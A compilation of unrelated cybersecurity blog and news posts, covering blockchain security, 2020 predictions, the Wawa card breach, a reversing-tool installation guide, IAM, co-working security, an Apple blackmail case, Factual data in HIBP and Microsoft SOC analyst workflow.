When all else fails, ensure that you have a good antivirus\antimalware solution. Thor Premium Enterprise, our product that incorporates two of our award-winning technologies (Thor Foresight Enterprise and Thor Vigilance Enterprise) will ensure that no malware lands on your machine, by continuously scanning your outbound and inbound traffic, severing any malicious C&C connection it detects.


Companies, regardless of their size and needs, can also benefit from freeware, shareware, and open-source software. It’s all about figuring out your needs and selecting the solution that makes the most sense. As always, if you have any questions, feel free to send me a message.

The post Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely appeared first on Heimdal Security Blog.

How can blockchain enable better data security for enterprises?

Estimated reading time: 2 minutes

NASA recently announced a proposal to explore the possibility of using blockchain to improve the cybersecurity of its current air traffic management systems. It was a powerful statement from one of the world’s most well-known organizations and a strong endorsement of blockchain which has the potential to change how business is conducted, worldwide.

To understand its power, it is important to understand what blockchain actually is — it is a type of ledger containing records arranged in data blocks that use cryptographic validation to link together. Blockchain is a database with built-in validation where all transactions are recorded and confirmed anonymously.

Decentralization for greater security

A key differentiating point about blockchain is that it is distributed and exists on multiple systems at the same time. Importantly, the information entered cannot be altered. Each user needs a private, cryptographically created key to access only the blocks they own. In this way, the ledger cannot be manipulated as no one can edit a blockchain without having the corresponding keys.

It is this decentralization that could revolutionize cybersecurity. The principle of blockchain technology is that there is no centralized authority or storage location – in conventional information systems, attackers can target this kind of a lower system to inflict maximum damage. This means each transaction is verified against the entire network with each transaction required to be verified cryptographically. This ultimately means that an entire database is not at risk in the event of a major vulnerability, mainly because it is distributed on different nodes unlike a conventional setup.

Benefits of blockchain technology

While research into blockchain continues, more and more companies are exploring how blockchain could benefit their enterprise security. Two key ways are:

A Lower percentage of DDoS attacks

Distributed denial of service (DDoS) attacks occur when an attacker launches multiple, continuous attacks on a server, ultimately compelling it to get overwhelmed and collapse. However, the very decentralization which is at the heart of blockchain technology could enable a lower percentage of DDoS attacks on enterprises. The information would be distributed along a large number of nodes ensuring there is no single point of vulnerability.

Better data protection

Enterprises have to be much more careful about the way they handle customer data considering the new wave of data protection laws across the world. Blockchain technology could ensure better protection of data, thanks to its inbuilt protection mechanisms. Data is cryptographically secured with unique keys and distributed across multiple devices.  Each node has a copy of the entire blockchain which is synchronized with a new update with details also recorded. Hence, any attempt at trying to delete data or put false data can be immediately detected.

With many companies exploring the power of blockchain for cybersecurity and other functions, it is quite clear that the technology has a long future. Enterprises must continue to explore ways in which they can unlock the power of blockchain to enable greater cybersecurity.

The post How can blockchain enable better data security for enterprises? appeared first on Seqrite Blog.

Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020

2019 is virtually over and a new year beckons with all the solemnity of the grim reaper for those who don’t have their eyes wide open to the persistent threats we collectively face in the areas of privacy and cybersecurity. 

Now that I have your attention, I’d like to add that it’s not all bad news. In the main, consumers and business leaders alike are more aware of cybersecurity and privacy than ever before. However, this sea change has been met with innovation on the criminal side of things. As defenses improve, the attack vectors become more nuanced and technically impressive. At times it can seem like a war of attrition, which brings us to the first series of predictions for 2020:

  1. CISOs will get worse at their jobs. Okay, simmer down all you cybersecurity people. I just mean there will be a shortage of experts–i.e., fewer of you to go around because at this moment in history everyone understands that a good CISO is critical to the ongoing success of an enterprise (the 2019 IBM Cost of Data Breach study found that the average cost to an organization was $3.92 million). With the demand for cybersecurity professionals far exceeding supply, the market will start having openings for less qualified people. Water finds its level, but it will be rough for a while. 
  2. The disinformation blob will grow. With what we experienced in 2016 and 2018, is there any doubt there will be a rise in disinformation–homegrown and imported–of all stripe in the upcoming elections? Since these weaponized misinformation campaigns have proven effective, expect to see more of them in the private sector, with businesses adopting troll farm tricks to hurt the competition–or rather waiting to be discovered by intrepid reporters like Brian Krebs.
  3. Ransomware will continue to thrive. As long as humans are well……human, phishing attacks will lead to ransomware infecting more and more networks, and businesses, municipalities and other organizations will continue to pay whatever they must in order to regain control of their data and systems. We will also see better backup practices that will help minimize or neutralize the threat of these attacks. 
  4. IoT botnets will make dystopian paranoia seem normal. IoT will continue to grow exponentially. In 2020 there will be somewhere around 20 billion IoT devices in use around the world. Unfortunately, many are not secure because they are protected by nothing more than manufacturer default passwords readily available online. They will weaponized (like years past) but with increasing skill and computing power. 
  5. The integrity of the US elections will be questioned–and for good reason. There are still voting machines in use that are far from secure, and would not pass the most simple audits. Some states continue to use machines that leave no paper trail. Look forward to questions regarding election security all year. 
  6. Cryptocurrency miners will continue to get rich off of stolen electricity. Related to the botnet craze, we will see an increase in computing power theft used to mine cryptocurrency. With bots becoming exponentially more effective as the result of AI and cloud computing, we will see a renaissance of Wild West behavior in the world’s cryptomines.  
  7. Zero trust environments will be talked about. A few may exist. The assumption that one can trust the home team–people within one’s organization–sort of went the way of the Dodo bird when Edward Snowden walked away from the NSA carrying a treasure trove of NSA data hidden in a Rubic’s Cube. Zero trust simply means that no one can be trusted, in or outside the organization. With this assumption foremost, new systems make breaches and compromises harder to happen. Stay tuned.
  8. More people will know what “protect surface” means. Protect surface is part of the zero-trust environment. An organization’s attackable surface includes every error-prone human in its employ as well as the mistakes in configuration they may have committed along the way and a whole constellation of other issues. The protect surface is much smaller and must be kept out of harm’s way. The more we talk about subjects like protect surface, the stronger our cybersecurity will be.
  9. Cars will be frozen. Or not. But actually, yes. I think it will happen. Driverless cars are going to hit things as well as get hit. Cars that talk to satellites are toast. It’s going to happen. (Or not. But it totally could.)
  10. 5G will make the cyber smash grab a thing.  5G is going to make everything move fast, as will the new generation USB4 devices . With quicker speed, it will take much less time to transfer data. Coincidentally, criminals appreciate this as much as the rest of us. 
  11. Social media will no longer need to be private. Social media companies will probably become a bit more responsible when it comes to the way they gather, store, crunch, analyze and sell our data to marketing companies and small to medium sized businesses looking to connect directly with consumers. This is really not worth talking about, however, because all of our information has already been scooped up. It’s good news for 2020 babies. 
  12. State-sponsored traffic jams will be a thing. The hackers who brought you Hillary’s emails and who probably have President Trump’s tax returns are going to target operational systems with an array of tactics that include ransomware and more DDoS attacks that will snarl things up in ways we’ve not yet seen. The targets will be financial institutions, the power grid, an election, a company’s secret sauce, a city’s traffic lights or, you can fill in the blank.
  13. You’re going to have personal cyber insurance. Insurance companies will be writing more comprehensive cyber liability policies for businesses and offering innovative personal cyber coverage for consumers.
  14. HR will save money by spending some. More employers will offer their employees identity protection products and services as part of their paid or voluntary benefits programs. (An employee who has their identity stolen is not very productive and if, as part of that identity theft, their USER ID or passwords are exposed, a thief might have what he or she needs to access an employer’s network and sensitive databases.)
  15. The cloud will leak. The parade of stories about misconfigured cloud clients and data stored without any password protection on cloud services will continue apace, perhaps in part because of the CISO issue discussed in the first prediction. 
  16. AI will gladly take your job. The Yang Gang knows it’s true. AI is here and it’s willing to work so that you can go fishing, collect that monthly $1,000 and not make ends meet. In all seriousness, the CISO shortage as well as many of the innovations discussed in this list of predictions will be increasingly powered by Artificial Intelligence. 

2020 promises to be an interesting ride. Buckle up, because that driverless car might be hacked along the way. As ever, you are your best guardian when it comes to your privacy and personal cybersecurity. Be smart. Stay safe. And, have a very happy, healthy holiday season. 



The post Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020 appeared first on Adam Levin.

Reversing and Exploiting with Free Tools: Part 1

Pen testing is a dynamic process that requires practitioners to exploit an environment to expose security weaknesses. In order to do this safely and efficiently, pen testers enlist the help of different tools. This article series will focus on reversing and exploiting Windows using free and easy to get tools, such as IDA FREE, Radare, Windbg, X64dbg, or Ghidra.

We’ll begin with tool installation. From there, we’ll explore vulnerability theory, and then conclude with some  examples of exploitation.


First, let’s install the tools to set up our work environment.


Freeware Download Page_rev2.png


Download the file idafree70_windows. Follow the installer instructions to get IDA FREE running on your machine quickly.






Download the latest installer for Windows.



Once installation has finished just include the path where radare was installed into the environment variables.



Inside of the environment variables, go to the variable path and include these two lines (write your own paths if installed elsewhere):





Windows should now recognize the command radare2 when prompted.






Download the zip file and decompress it wherever you want. For example, you could use a Virtual Machine in VMWARE.

Once the tool is decompressed, install Java from the Oracle webpage. GHIDRA recommends version 11 for compatibility. (Once the installer has finished, include the java path where the java executable is located (usually the bin path) in the path environment variable as seen before.

Alternately, other users of GHIDRA recommend the version 11 of the OpenJDK.




While installing with the OpenJDK installer, it’s possible to automatically add it to the variable PATH:



Once Java is installed in your environment, you can begin to run GHIDRA.



Click the bat file, and GHIDRA will boot up:




There are new snapshots of x64dbg almost everyday. Go to the sourceforge web page and install the latest version:



Once you have  unzipped the file, move it to the release folder:



When you run it with administrator privileges, a launcher appears for you to choose which version you would like to run or if you want to install the debugger in the system:




Snowman was originally part of x64dbg. Now it’s a plugin we can download and install, which will decompile our binaries. Download it and copy it inside of plugins folder.



The version with 32 bits goes to 32 bits plugins folder, and the 64 bits version goes to the 64 bits plugins folder.




If you have Windows 10, to install windbg you just have to go to the Microsoft store and search for WinDbg.



WinDbg Preview will install automatically. If you have the Windows 7, you’ll have to install a previous version.

There you have some older versions:



Next step, configure symbols for WINDBG, create the folder symbols in “C:\” and then go to environment variables and create the variable _NT_SYMBOL_PATH.



As value write:


With this we already have installed WINDBG PREVIEW.




This free hexadecimal editor will allow you to edit binary files.




The newest version of Python 3 will help create the exploits for each exercise.



Download the latest version.

Find and select the option in the installer to aggregate Python.exe to the PATHenvironment variable  automatically.

Usually the installation path will be:


Python38 may be different in your case.

Once installed, you should be able to execute Python as needed.




Pycharm will be our Integrated Development Environment (IDE) for Python.  Go to the jetbrains web page and select the latest version.




Select all of the above options, so it will be included in PATH environment variable. Once installed, create a new project:



Check the RUN->DEBUG configuration and verify that the “Base interpreter” option points to the correct Python interpreter.



Search in settings for ”project interpreter” and check that the correct version of Python is detected.



This will allow you to convert files to python and move them into Pycharm.



For example, pepe.txt has been converted into When you click  “Run,” the next screen should appear:



The console of the  pycharm screen should print:



Pycharm features autocomplete. For instance, if you point with the mouse to the word “os”, and press Ctrl and click, pycharm should take you to the code of “os” python library.



Now that you’ve installed the right tools for our exploiting environment, you’re ready to move on to part two, which  will begin with a little bit of theory about buffer overflow. From there, you’ll complete a few simple exercises.

Continue to part two >>

Latest from CoreLabs
Attribute this content to a different author: 
Ricardo Narvaja
Big text: 
Resource type: 

What Is IAM Security?


Identity and Access Management (IAM) security is an essential part of overall IT security that manages digital identities and user access to data, systems, and resources within an organization. IAM security includes the policies, programs, and technologies that reduce identity-related access risks within a business. IAM programs enable organizations to mitigate risks, improve compliance, and increase efficiencies across the enterprise.

What Are the Benefits of IAM Security?

IAM is a cybersecurity best practice and ensures greater control of user access. By identifying, authenticating, and authorizing users, while prohibiting unauthorized ones, IAM security improves the efficiency and effectiveness of access management throughout the business.

Enhance Security and Mitigate Risks

A recent study found that 50 percent of organizations indicate identity and access management programs are the most effective security tool to protect against insider threats, while 75 percent of organizations that use identity and access management solutions saw a reduction of unauthorized access incidents. Overseeing appropriate access through the right IAM security framework goes a long way towards bolstering an organization’s risk management and security posture.

When managing access within the organization, IAM security also ensures that users have the right access privileges required for their job. Without it, bulk approvals for access requests, frequent changes in roles and departments, and the lack of suitable processes for access reviews contributes to excessive access privileges—opening up the organization to insider threats and magnifying risk throughout the business.

Increase Operational Efficiencies

IAM security empowers organizations to do more with less. Many security teams today are understaffed and overextended, but are expected to manage and protect increasing numbers of devices, data, users, and systems. By leveraging IAM programs to automate and streamline access management, organizations can boost operational efficiencies. One study found that 49 percent of organizations view operational efficiency as an IAM program driver.

Improve Compliance

As regulatory compliance and industry mandates like SOX, HIPAA, and GDPR have become increasingly stringent and more complex in recent years, organizations face more auditing, compliance reviews, and mandatory reporting. IAM security solutions that automate data collection, reporting, and access reviews enable companies to limit access to only those individuals who need it and stay more compliant to industry standards. By leveraging strategic IAM security policies, organizations can ensure data is strictly controlled and prove they are taking proactive steps to meet ongoing compliance requirements.

What Are Effective IAM Security Tools?

Organizations today typically use leading IAM security tools through best of breed solution partners—from identity governance solutions to privileged access management to access intelligence tools offered either on premise, on cloud or through hybrid model. These tools make up the technology solutions that support the overall IAM security framework and are essential in establishing a solid foundation for identity and access management.


Identity and Access Management
Big text: 
Resource type: 
Ready to learn more best practices around IAM Security?

 Download the Identity and Access Management Report today to find out how other companies are leveraging IAM security in their business.

Top tech stories of 2019

The new Apple Card, the battle for cryptocurrency dominance, cybersecurity skills shortage – just a few of the stories that made headlines in 2019. Watch as IDG TECH(talk) hosts Ken Mingis and Juliet Beauchamp discuss the top tech stories of the year.

How Organizations Can Defend Against Advanced Persistent Threats

Advanced persistent threats (APTs) have emerged to be legitimate concerns for all organizations. APTs are threat actors that breach networks and infrastructures and stealthily lurk within them over extended spans of time. They typically perform complex hacks that allow them to steal or destroy data and resources. According to Accenture, APTs have been organizing themselves into groups that

Cybersecurity And Privacy for a Co-Working Space

The way we work and the spaces we work in have evolved considerably in the last fifty years. Corporate culture is nothing like what it used to be back in the 80’s and 90’s. Cabins and cubicles have given way to open offices. Many in the work-force today prefer to work remotely and maintain flexible hours. As such, hot-desking is common in many multi-national companies including those who have large office spaces. As the start-up culture evolved, there was a need for multiple small offices. This growing breed of self-employed professionals and start-up owners need other resources that are commonly required in the office environment like printers, shredders, Wi-Fi, meeting rooms, video-conferencing abilities etc . They also need a common place to meet people, network and exchange ideas because working solo could be monotonous at some time. Co-working has provided an all-in-one solution for the needs of such individuals and small groups of people by providing a common space where equipment and utilities could be shared between businesses who rent the space. Co-working spaces have thus become very popular across the world and especially in cities where real-estate is very expensive. According to statistics the number of co-working spaces has increase by 205% between 2014 and 2018

In any business however, security is paramount. Corporate espionage is very much a reality for small businesses that are very often the breeding ground for great ideas and innovations. Co-working spaces provide a melting pot for all kinds of unrelated people some of who cannot really be trusted. Thus it is necessary that when sharing space, equipment and utilities, users do not unknowingly end up sharing information and trade secrets. Ensuring data privacy and cyber security in a shared office can be very difficult but may be achieved by laying down the ground rules and ensuring that everyone follows it. Following are some of the security best practices for a co-working space.

  1. Ensuring network Security: While shared Wi-Fi access is probably one of the most popular and over utilized services provided by a co-working space, it is also the most vulnerable from a cyber security perspective. Following are some of the practices that would ensure secure access of Wi-Fi networks for all users.
    1. Having a dedicated administrator who would ensure that networks are set up correctly and securely. This person can also liaise with users to ensure that they are following the guidelines
    2. Setting up strong passwords for every network and ensuring that all passwords are changed frequently. This would also prevent old or previous members from accessing the network.
    3. Setting up individual networks and access pages for every business that is using the space including a separate network for guests.


  1. Securing smart devices: IoT has enabled intelligence in every device like TV, refrigerators, coffee machines and printers. A co-working space may be home to many such devices which are connected to the network. Tampering with any of these devices can allow people to access the Wi-Fi network or vice-versa. Therefore it is necessary to secure these devices by ensuring that their hardware is tamperproof and firmware is continuously updated. All devices that can connect to the network including laptops and phones should be password protected and should not be left around unlocked and/or unattended.


  1. Blocking websites: It is best to block potentially malicious websites which are not likely to do anyone any good. Corporate offices have always taken this step to prevent unwanted traffic and ensure network and data security. There is no reason why co-working spaces cannot offer this as a service.


  1. Vetting users: Co-working spaces may do a minimum background check on users to ensure that they fit-in with the business culture of the space and would not disrupt the normal functioning of the users in any way.


  1. Physical monitoring: Physical monitoring using cameras can ensure that users do not try to steal any data or equipment that does not belong to them. Providing physical access cards, logging in and out time of users and installing cameras can contribute to the overall security system of the space.


While these guidelines are general they should be useful to both the co-working space operators and users and would provide an idea on what to look out for and how to secure their private data and intellectual property.



The post Cybersecurity And Privacy for a Co-Working Space appeared first on CyberDB.

Black Hat Hackers & White Hat Hackers – The Sequel

Estimated reading time: 2 minutes

Thanks to popular culture, the image of a hacker has often become stereotypical, which is ‘criminals using advanced cyber techniques to infiltrate enterprises or systems, with the intention to cause mayhem.’ It’s an image carefully cultivated by movies and books to the extent that many people may not be aware that there is actually more to the popular stereotype.

At its most basic, hacking is referred to as the bypassing of security measures to enter a computer device or network. The individuals who do this are called hackers —  however, all hackers are not cybercriminals.

Sometimes, organizations may even reward hackers to infiltrate their systems.

Surprised? Read on as we add on to our previous blog on the same topic.

The White Hat hacker

The white-hat hacker is a form of an external audit used and even favoured by many organizations. Thanks to their specialized knowledge of breaking into systems, white hat hackers could well be intricately aware of the flaws present inside an enterprise’s cybersecurity posture, perhaps more so than even the security teams. Since white hat hackers do what they do for a living, they can spot vulnerabilities and loopholes in systems which may not be visible within the organization.

White hat hackers are employed by many different organizations across the world to test their security defences. Seqrite offers Red Team Assessments as a service, which are mock trials of how well an enterprise’s people, processes and technology hold up to cyberattacks which are conducted by highly trained security professionals who attempt to breach an organization. Red Team Assessments were recently recommended by the Reserve Bank of India (RBI), India’s central banking institution,  who endorsed the use of such kind of assessments for financial institutions.

The major difference between white hat and black hat hackers are that the former enters an organization’s system with its full consent and knowledge. White hat hackers are not motivated by malice but with a genuine desire to help enterprises iron out its cybersecurity flaws.

The Black Hat hacker

The black hat hacker is the cybercriminal that enterprises worry about — like white hat hackers, they are professionals with an in-depth knowledge of how to identify loopholes in an organization’s cybersecurity framework and use these to penetrate & attack. Unlike white hat hackers, they aren’t motivated by any good intentions but by malice.

Black hat hackers are cybercriminals because they have malicious motives to attack businesses. The motives can vary from stealing confidential data and selling it on the black web or even just to create chaos within an organization. In many cases, even script kiddies who may not be experienced, try and use software to conduct hacking attacks or run Distributed Denial of Service (DDoS) attacks to bring an organization to its knees.

However, enterprises know that the key to dealing with black hat hackers is to maintain a powerful security solution which can plug gaps in vulnerabilities and call out suspicious user behaviour when it happens. Seqrite offers a range of security solutions for an enterprise assuring powerful protection against hackers and other threats. Whether it is endpoint security or providing an integrated threat management solution for the network, enterprises can depend on Seqrite for their cybersecurity protection.

The post Black Hat Hackers & White Hat Hackers – The Sequel appeared first on Seqrite Blog.

Data Breach Compromises Payment Card Info At Wawa Stores

Convenience store and gas station chain Wawa informed customers of a data breach that compromised payment card information at most of its 842 locations.

In an announcement released December 19, Wawa CEO Chris Gheysens

stated that the company’s  information security team had discovered malware on their payment processing servers about a week earlier. The malware had been active since March 4, 2019, meaning that payment card information including credit and debit card numbers, expiration dates, and cardholder names over the last several months may have been compromised.

“This malware affected customer payment card information used at potentially all Wawa locations beginning at different points in time after March 4, 2019 and until it was contained,” stated Gheyser.

While Wawa specified that payment card security codes weren’t compromised in the breach, security experts have pointed out that they ultimately offer little protection in the face of a large-scale data breach. While a three or four digit code may be cumbersome for a human to guess, “[t]o a machine, it’s nothing,” said cybersecurity expert Matt Wilson to Philadelphia Magazine.

The exact nature of the malware used to breach Wawa’s payment card processing systems hasn’t been made available to the public, but it was apparently able to both overcome chip-based card protections and remain unnoticed for nine months on the company’s systems.

Wawa is offering a year of free identity protection and credit monitoring to affected customers. 

The post Data Breach Compromises Payment Card Info At Wawa Stores appeared first on Adam Levin.

North London hacker sentenced for blackmailing Apple

On Friday, a British citizen was convicted for trying to bribe Apple by alleging that he had a massive iCloud folder and other Apple accounts.

The guy, 22-year-old Kerem Albayrak from North London, approached Apple Security alleging that millions of iCloud users had access to information. He demanded Apple to give him a bitcoin ransom of $75,000 or a thousand $100 iTunes gift cards in return for deleting the folder.

Albayrak told Apple Security on March 12, 2017 that if the company refused to pay, it would sell the online database and factory reset devices associated with 319 million iCloud accounts.

A week later, a video depicting him accessing two apparently random iCloud accounts was posted on YouTube, and the connection was sent to Apple and multiple media organizations.

Two days later, he revealed that the demand had increased to $100,000 and that, when Apple made the offer, he would delete any iCloud account he held.

The tech company headquartered in Cupertino has approached law enforcement in both the U.S. and the U.K.

The British Cyber Crime Unit of the National Crime Agency (NCA) arrested the man at his home in North London on March 28, 2017 and confiscated various devices, including his phone, laptops and hard drive.

The NCA found during its inquiry that Albayrak was serving as the hacker group’s spokesman naming itself “Turkish Crime Family.” Police have verified Apple’s conclusions that no network breach has occurred. Albayrak’s data claimed to possess was mostly inactive from previously compromised third-party services.

The miscreant pleaded guilty to one count of blackmail at the beginning of December. Earlier, he confessed to two counts of unlawful actions “with the purpose of impairing or hindering the activity of a computer access,” the NCA said.

On Friday, Albayrak was sentenced to a conditional prison term of two years, as well as 300 hours of unpaid work, and an electronic curfew lasting six months.

“Albayrak wrongly believed he could escape justice after hacking in to two accounts and attempting to blackmail a large multi-national corporation. During the investigation, it became clear that he was seeking fame and fortune. But cyber-crime doesn’t pay,” said Anna Smith, a senior investigative officer for the NCA.

The post North London hacker sentenced for blackmailing Apple appeared first on .

When Is Data “Public”? (And 2.5M Public Factual Records in HIBP)

When Is Data

When is data "public"? And what does "public" even mean? Does it mean it's merely visible to the public? Or does it mean the public can do anything they like with it? This discussion comes up time and time again as it did with the huge leak of PDL data only last month. For the most part, the impacted data in this incident came from LinkedIn, a service where by design we (including myself) publish personal information about ourselves for public consumption. So what's the problem? Willingly publishing your personal data online in a specific context is one thing, an organisation then taking it providing it another context is... unsettling:

As I said in the intro to the PDL blog post, the pattern of data being collected via data aggregators then being redistributed outside their control (whether you call it a "leak", a "spill" or a "breach") is becoming alarmingly common. Subsequently, when someone recently sent me an alleged breach titled "factual.com_places_db_8M", it wasn't overly surprising. Factual is "a location data company that helps marketers and their organizations use location to better understand, reach and engage consumers". They were mentioned in the recent New York Times piece titled Twelve Million Phones, One Dataset, Zero Privacy which is an absolutely fascinating story. To be fair to Factual, their position in that story represents them on a higher moral ground and there are certainly many shades of grey when it comes to the ethics data aggregators operate under.

Moving on, the data allegedly sourced from Factual included a 1.1GB CSV file which contained fields for name, email, country, region, locality, address, postcode, latitude, longitude, tel, fax and website. The create date on the file was 22 March 2017. As the filename suggests, there were almost 8M records although "only" 2.5M unique email addresses (many records didn't include this field). For the most part, the data fell into the "public" category insofar as I'd expect to be able to go and locate much of it on a record-per-record basis, yet there's also the question of whether it should exist in one aggregated location in the first place and whether the owners of the data expected it to be used in this fashion. So I asked people; I emailed a handful of the near 3M subscribers I have in HIBP who appeared in the data set and I asked them 3 questions:

  1. Is this data about you accurate?
  2. Do you consider it to be public domain info that should be redistributed?
  3. Should it appear in HIBP?

On the first point, responses varied:

It is not accurate
It appears to me that all of the information below is publicly available either on our website or job postings currently.
The data is not accurate and most is fake
Yes, I was a travelling notary at one time.
I don’t work for [redacted] and that is not my phone number or address. The only thing correct was my name, email and website.

I found these responses interesting from the perspective of how reliable services from aggregators really are. With the caveat that I have zero insight into where Factual actually gets their data from, I would imagine that large scale aggregation from public sources would be fraught with data integrity challenges. Be that as it may, we're still talking about millions of people's email addresses popping up in unexpected places, which brings me to the responses to the second question about whether this data should be online in this fashion:

No, that address is private, and is a home address on my credit report.
As the information appears to be fake it should not be available online to the public
My email should not be associated with those other names/adresses/website that you found..
I live in Norway, don't run any businesses - other than just the tiny personal etsy shop you see linked below!

These responses speak to my point in the opening paragraph about the expectations people have about how their data is used, regardless of how visible it is online. And as for the final question about whether the data should be loaded into HIBP, the responses were a unanimous "yes" so as of now, it's searchable along with the other 9.3B records already in the system.

To ensure Factual were aware there was data circulating that was attributed to them and claiming to be a "breach", I got in touch with them and privately disclosed the incident. To their credit, they were receptive, responsible and professional in the way they responded and provided the following quote:

Factual has reviewed a data file provided by Troy Hunt and determined that the file contains publicly available information about businesses and other points of interest that Factual makes available on its website and to customers. The company does not believe the information was obtained from a source other than its public website.

The data includes business names, locations, website addresses, hours of operation, and contact information that the businesses themselves have made public, such as on their websites, in directories, and on social media. It is similar to data available from other public sources such as yellow pages data and mapping apps on mobile phones.

Those interested correcting business information that may be personal data under GDPR or other applicable privacy law are encouraged to reference our privacy policy for more information:

We appreciate Mr. Hunt’s efforts to notify us and his assistance with information to facilitate our investigation.

The last thing I'l leave you with is a tweet from earlier this month which is relevant to the Factual situation. Jeremiah poses a really interesting question and the responses make for some good reading about what's changed culturally:

CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life

The Lessons learned from the Microsoft SOC blog series is designed to share our approach and experience with security operations center (SOC) operations. We share strategies and learnings from our SOC, which protects Microsoft, and our Detection and Response Team (DART), who helps our customers address security incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

For the next two installments in the series, we’ll take you on a virtual shadow session of a SOC analyst, so you can see how we use security technology. You’ll get to virtually experience a day in the life of these professionals and see how Microsoft security tools support the processes and metrics we discussed earlier. We’ll primarily focus on the experience of the Investigation team (Tier 2) as the Triage team (Tier 1) is a streamlined subset of this process. Threat hunting will be covered separately.

Image of security workers in an office.

General impressions

Newcomers to the facility often remark on how calm and quiet our SOC physical space is. It looks and sounds like a “normal” office with people going about their job in a calm professional manner. This is in sharp contrast to the dramatic moments in TV shows that use operations centers to build tension/drama in a noisy space.

Nature doesn’t have edges

We have learned that the real world is often “messy” and unpredictable, and the SOC tends to reflect that reality. What comes into the SOC doesn’t always fit into the nice neat boxes, but a lot of it follows predictable patterns that have been forged into standard processes, automation, and (in many cases) features of Microsoft tooling.

Routine front door incidents

The most common attack patterns we see are phishing and stolen credentials attacks (or minor variations on them):

  • Phishing email → Host infection → Identity pivot:

Infographic indicating: Phishing email, Host infection, and Identity pivot

  • Stolen credentials → Identity pivot → Host infection:

Infographic indicating: Stolen credentials, Identity pivot, and Host infection

While these aren’t the only ways attackers gain access to organizations, they’re the most prevalent methods mastered by most attackers. Just as martial artists start by mastering basic common blocks, punches, and kicks, SOC analysts and teams must build a strong foundation by learning to respond rapidly to these common attack methods.

As we mentioned earlier in the series, it’s been over two years since network-based detection has been the primary method for detecting an attack. We attribute this primarily to investments that improved our ability to rapidly remediate attacks early with host/email/identity detections. There are also fundamental challenges with network-based detections (they are noisy and have limited native context for filtering true vs. false positives).

Analyst investigation process

Once an analyst settles into the analyst pod on the watch floor for their shift, they start checking the queue of our case management system for incidents (not entirely unlike phone support or help desk analysts would).

While anything might show up in the queue, the process for investigating common front door incidents includes:

  1. Alert appears in the queue—After a threat detection tool detects a likely attack, an incident is automatically created in our case management system. The Mean Time to Acknowledge (MTTA) measurement of SOC responsiveness begins with this timestamp. See Part 1: Organization for more information on key SOC metrics.

Basic threat hunting helps keep a queue clean and tidy

Require a 90 percent true positive rate for alert sources (e.g., detection tools and types) before allowing them to generate incidents in the analyst queue. This quality requirement reduces the volume of false positive alerts, which can lead to frustration and wasted time. To implement, you’ll need to measure and refine the quality of alert sources and create a basic threat hunting process. A basic threat hunting process leverages experienced analysts to comb through alert sources that don’t meet this quality bar to identify interesting alerts that are worth investigating. This review (without requiring full investigation of each one) helps ensure that real incident detections are not lost in the high volume of noisy alerts. It can be a simple part time process, but it does require skilled analysts that can apply their experience to the task.

  1. Own and orient—The analyst on shift begins by taking ownership of the case and reading through the information available in the case management tool. The timestamp for this is the end of the MTTA responsiveness measurement and begins the Mean Time to Remediate (MTTR) measurement.

Experience matters

A SOC is dependent on the knowledge, skills, and expertise of the analysts on the team. The attack operators and malware authors you defend against are often adaptable and skilled humans, so no prescriptive textbook or playbook on response will stay current for very long. We work hard to take good care of our people—giving them time to decompress and learn, recruiting them from diverse backgrounds that can bring fresh perspectives, and creating a career path and shadowing programs that encourage them to learn and grow.

  1. Check out the host—Typically, the first priority is to identify affected endpoints so analysts can rapidly get deep insight. Our SOC relies on the Endpoint Detection and Response (EDR) functionality in Microsoft Defender Advanced Threat Protection (ATP) for this.

Why endpoint is important

Our analysts have a strong preference to start with the endpoint because:

  • Endpoints are involved in most attacks—Malware on an endpoint represents the sole delivery vehicle of most commodity attacks, and most attack operators still rely on malware on at least one endpoint to achieve their objective. We’ve also found the EDR capabilities detect advanced attackers that are “living off the land” (using tools deployed by the enterprise to navigate). The EDR functionality in Microsoft Defender ATP provides visibility into normal behavior that helps detect unusual command lines and process creation events.
  • Endpoint offers powerful insights—Malware and its behavior (whether automated or manual actions) on the endpoint often provides rich detailed insight into the attacker’s identity, skills, capabilities, and intentions, so it’s a key element that our analysts always check for.

Identifying the endpoints affected by this incident is easy for alerts raised by the Microsoft Defender ATP EDR, but may take a few pivots on an email or identity sourced alert, which makes integration between these tools crucial.

  1. Scope out and fill in the timeline—The analyst then builds a full picture and timeline of the related chain of events that led to the alert (which may be an adversary’s attack operation or false alarm positive) by following leads from the first host alert. The analyst travels along the timeline:
  • Backward in time—Track backward to identify the entry point in the environment.
  • Forward in time—Follow leads to any devices/assets an attacker may have accessed (or attempted to access).

Our analysts typically build this picture using the MITRE ATT&CK™ model (though some also adhere to the classic Lockheed Martin Cyber Kill Chain®).

True or false? Art or science?

The process of investigation is partly a science and partly an art. The analyst is ultimately building a storyline of what happened to determine whether this chain of events is the result of a malicious actor (often attempting to mask their actions/nature), a normal business/technical process, an innocent mistake, or something else.

This investigation is a repetitive process. Analysts identify potential leads based on the information in the original report, follow those leads, and evaluate if the results contribute to the investigation.

Analysts often contact users to identify whether they performed an anomalous action intentionally, accidentally, or was not done by them at all.

Running down the leads with automation

Much like analyzing physical evidence in a criminal investigation, cybersecurity investigations involve iteratively digging through potential evidence, which can be tedious work. Another parallel between cybersecurity and traditional forensic investigations is that popular TV and movie depictions are often much more exciting and faster than the real world.

One significant advantage of investigating cyberattacks is that the relevant data is already electronic, making it easier to automate investigation. For many incidents, our SOC takes advantage of security orchestration, automation, and remediation (SOAR) technology to automate investigation (and remediation) of routine incidents. Our SOC relies heavily on the AutoIR functionality in Microsoft Threat Protection tools like Microsoft Defender ATP and Office 365 ATP to reduce analyst workload. In our current configuration, some remediations are fully automatic and some are semi-automatic (where analysts review the automated investigations and propose remediation before approving execution of it).

Document, document, document

As the analyst builds this understanding, they must capture a complete record with their conclusions and reasoning/evidence for future use (case reviews, analyst self-education, re-opening cases that are later linked to active attacks, etc.).

As our analyst develops information on an incident, they capture the common, most relevant details quickly into the case such as:

  • Alert info: Alert links and Alert timeline
  • Machine info: Name and ID
  • User info
  • Event info
  • Detection source
  • Download source
  • File creation info
  • Process creation
  • Installation/Persistence method(s)
  • Network communication
  • Dropped files

Fusion and integration avoid wasting analyst time

Each minute an analyst wastes on manual effort is another minute the attacker has to spread, infect, and do damage during an attack operation. Repetitive manual activity also creates analyst toil, increases frustration, and can drive interest in finding a new job or career.

